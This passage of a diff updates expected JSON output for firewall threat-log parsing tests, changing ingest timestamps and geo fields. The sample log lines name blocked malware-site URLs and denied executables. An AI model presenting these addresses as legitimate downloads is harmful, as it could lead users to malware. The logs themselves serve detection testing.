UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -6951,7 +6706,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079296300Z", + "ingested": "2021-12-14T14:49:56.151597687Z", "original": "Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:56:23.000-04:00", "timezone": "America/New_York", @@ -6976,22 +6731,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -7092,7 +6842,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079300900Z", + "ingested": "2021-12-14T14:49:56.151598049Z", "original": "Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:57:33.000-04:00", "timezone": "America/New_York", @@ -7117,22 +6867,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -7233,7 +6978,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079305200Z", + "ingested": "2021-12-14T14:49:56.151598507Z", "original": "Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1\u0026back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:57:38.000-04:00", "timezone": "America/New_York", @@ -7258,22 +7003,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -7374,7 +7114,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079309100Z", + "ingested": "2021-12-14T14:49:56.151598846Z", "original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:58:52.000-04:00", "timezone": "America/New_York", @@ -7399,22 +7139,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -7515,7 +7250,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079313100Z", + "ingested": "2021-12-14T14:49:56.151599194Z", "original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:58:52.000-04:00", "timezone": "America/New_York", @@ -7554,22 +7289,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -7656,7 +7386,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079316600Z", + "ingested": "2021-12-14T14:49:56.151599641Z", "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:58:57.000-04:00", "timezone": "America/New_York", @@ -7681,22 +7411,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -7797,7 +7522,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079321700Z", + "ingested": "2021-12-14T14:49:56.151599995Z", "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:58:57.000-04:00", "timezone": "America/New_York", @@ -7836,22 +7561,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "European Union", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -7938,7 +7658,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079327600Z", + "ingested": "2021-12-14T14:49:56.151600341Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -7977,22 +7697,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -8079,7 +7794,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079333400Z", + "ingested": "2021-12-14T14:49:56.151600685Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -8104,22 +7819,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -8220,7 +7930,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079339200Z", + "ingested": "2021-12-14T14:49:56.151601034Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -8259,22 +7969,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Netherlands", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -8361,7 +8066,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079345100Z", + "ingested": "2021-12-14T14:49:56.151601380Z", "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", @@ -8400,22 +8105,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "European Union", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -8502,7 +8202,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079350900Z", + "ingested": "2021-12-14T14:49:56.151601720Z", "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", @@ -8527,22 +8227,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Russian Federation", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -8643,7 +8338,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079356600Z", + "ingested": "2021-12-14T14:49:56.151602093Z", "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,\"boialex.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", @@ -8668,22 +8363,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Russian Federation", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -8784,7 +8474,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079362800Z", + "ingested": "2021-12-14T14:49:56.151602448Z", "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,\"edw-melon.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", @@ -8809,22 +8499,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Russian Federation", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -8925,7 +8610,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079368600Z", + "ingested": "2021-12-14T14:49:56.151602787Z", "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,\"maximtushin.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", @@ -8964,22 +8649,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -9066,7 +8746,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079374300Z", + "ingested": "2021-12-14T14:49:56.151603135Z", "original": "Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:17.000-04:00", "timezone": "America/New_York", @@ -9091,22 +8771,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -9207,7 +8882,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079396400Z", + "ingested": "2021-12-14T14:49:56.151603477Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -9232,22 +8907,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -9348,7 +9018,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079402200Z", + "ingested": "2021-12-14T14:49:56.151603820Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,\"default.aspx\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -9387,22 +9057,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -9489,7 +9154,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079407900Z", + "ingested": "2021-12-14T14:49:56.151604166Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -9528,22 +9193,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -9630,7 +9290,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079413500Z", + "ingested": "2021-12-14T14:49:56.151604506Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -9655,22 +9315,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -9771,7 +9426,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079419400Z", + "ingested": "2021-12-14T14:49:56.151604847Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,\"c.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -9810,22 +9465,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -9912,7 +9562,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079425200Z", + "ingested": "2021-12-14T14:49:56.151605246Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -9937,22 +9587,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -10053,7 +9698,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079430400Z", + "ingested": "2021-12-14T14:49:56.151605612Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -10092,22 +9737,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -10194,7 +9834,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079433800Z", + "ingested": "2021-12-14T14:49:56.151606018Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -10233,22 +9873,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Ukraine", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -10335,7 +9970,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079438200Z", + "ingested": "2021-12-14T14:49:56.151606374Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -10374,22 +10009,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -10476,7 +10106,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079443200Z", + "ingested": "2021-12-14T14:49:56.151606724Z", "original": "Mar 25 23:59:37 